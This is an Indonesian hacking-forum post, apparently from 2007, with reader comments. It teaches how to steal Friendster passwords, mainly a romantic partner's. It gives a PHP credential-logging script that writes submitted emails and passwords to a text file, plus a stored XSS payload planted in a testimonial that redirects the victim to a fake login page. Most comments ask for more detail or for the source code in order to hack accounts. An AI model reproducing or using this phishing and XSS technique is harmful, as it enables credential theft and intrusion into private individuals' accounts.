Jasakom Community - Penerapan Social Engineering untuk mendapatkan password di Friendster

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda...

Lanjutt ....

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. :P .

So langsung saja kita menuju acara puncak ...

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk ...
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).



5. Sertakan code php dan JavaScript di bawah ini dan " SAVE As " sesuai dg nama link yg dituju pada Form Login.

       $email = $_POST[email];
   $password = $_POST[password];
   $fl = fopen('password.txt', 'a');
   fwrite($fl, "$email . $password \n\n");
   fclose($fl);

   ?>



   Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

   hai syang .. gimna kabarna, kagen nie .. <script>window.location=" http://webyangsupportphp.com/index.htm";</script> kpn ke Jogja ..

   nah .. Setelah sang pacar penerima testi membuka "New Testimonials", maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
   Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta... :P =]

)

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan " OVERLAY GENERATOR " pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan " TOOLS "
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
---------
-V-i-e- My Queen

$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy's, rahmat-mh, n 2 friends that can't be says one by one.
$komp butut gw!!

$$$ Knowledge is belongs to world $$$

Download

	kucing - September 29, 2007 meong...(makasih choy)
	kronihack - Oktober 1, 2007 ngapain hack friendster gak ngehasilin apa apa....hihi ...coba cari yang lebih menguntungkan dong ah!!!!!
	th4riq - Oktober 8, 2007 kakak numpang_lewat... saya uda cb,tp javaxcsriptnya gk bisa jalan... haha... sptnya gagal... maklum saya emg butuh tips ini jadinya niat saya coba ampe brhsil,,, jd mohon bantuannya, thoriqgrady@yahoo.com
	am23ak7 - Oktober 10, 2007 khu khu khu... otreee...
	murdok - Oktober 21, 2007 kak ada penjelasan yang lebih gampang gak?? krn php aja gua gak tau... en 4. Upload file index.htm (ada di source). <- maksudnya ini apa?? mana souce nya?? Dan upload file diatas ke www.webyangsupportphp.com yang ini jg krn di website tuh gak ada pilihan uploadnya.. tolong di balas ya kak aq mau belajar Salute to you
	aditya - November 3, 2007 bos kok file nya ga bisa sih gw download
	blankman - November 3, 2007 ia kok filenya ga bs di download?
	kharisma - November 4, 2007 ada yang lebih gampang ngga kak?? pless ini pacar gua udah keterlaluan nih
	absorber - Desember 17, 2007 bos, FS gw br di hack org.. ada yg tau cara ngbalikin acc-nya gak? tengkiu..
	forbzoned - Januari 16, 2008 iya syusah jg neh..bisa kasih yg lbh detil lg gak fbz1809@yahoo.com
	ethernalWater - Januari 19, 2008 bro minta sourcenya dunk .... Ga bisa didownload tuh linknya, Trims n dtunggu kiriman source codenya di ethernal_water@yahoo.co.id
	agoess - Januari 21, 2008 bro.......minta yang lebih detil. msklum bsru pemula........... and minta sourcenya dunk .... Ga bisa didownload tuh linknya, Trims n dtunggu kiriman source codenya di agoess.as@gmail.com
	dewahmbali - Januari 21, 2008 gimana neh kok forumnya g diapdate banyak yang komplain klo lingkny g bisa di download om moderator gimana?tplong dikasi pencerahan
	exist - Januari 23, 2008 kumaha ieu teh?
	muztofue - Februari 16, 2008 om yang baek, minta sourcenya dunk .... linknya Ga bisa didownload .... plis, gua masi newnie yang baru dalam tahap belajar, aq tunggu ya di muz_tofue@yahoo.co.id trims all
	amoralsickness - Februari 19, 2008 waduuh bos saya boleh comment gk nech ... ? klo saya liat2 dr forum ini kurang lengkap bos .. kebanyakan orang jg lom paham dengan apa yg dikatakan "CHMOD" dan orang2 pasti ribet dengan apa yg dimaksud dengan "CHMOD" ... orang bisa upload php nya di web2 manapun .. cmn orang2 cmn isa pasang di fs tp cara liat passwordnya mreka agak kesulitan ... tolong yah bos agak diperjelas dengan semuanya makasih udah share ma kita ... newbie is the best loph u all
	numpanglewat - Maret 22, 2008 test .. test .. memperingati 1 thun menjadi newbis, thx jaskom mjd t4 lahir aq .. ^koqjaskomskrg^jd*sepi! ^senior2nya^pd^kbur^smua##^.^
	that6number - May 17, 2008 kak,tolong jelasin donk CHMOD itu ap?trux cara upload filenya gman??
	Darksatan - May 22, 2008 bos ajari dunk cara yang simple dan detail saya ini katrok kurang ngerti bahasa komputer tolong ya bos ajarin ku cra hck fs

Anda harus terdaftar untuk mengirimkan komentar.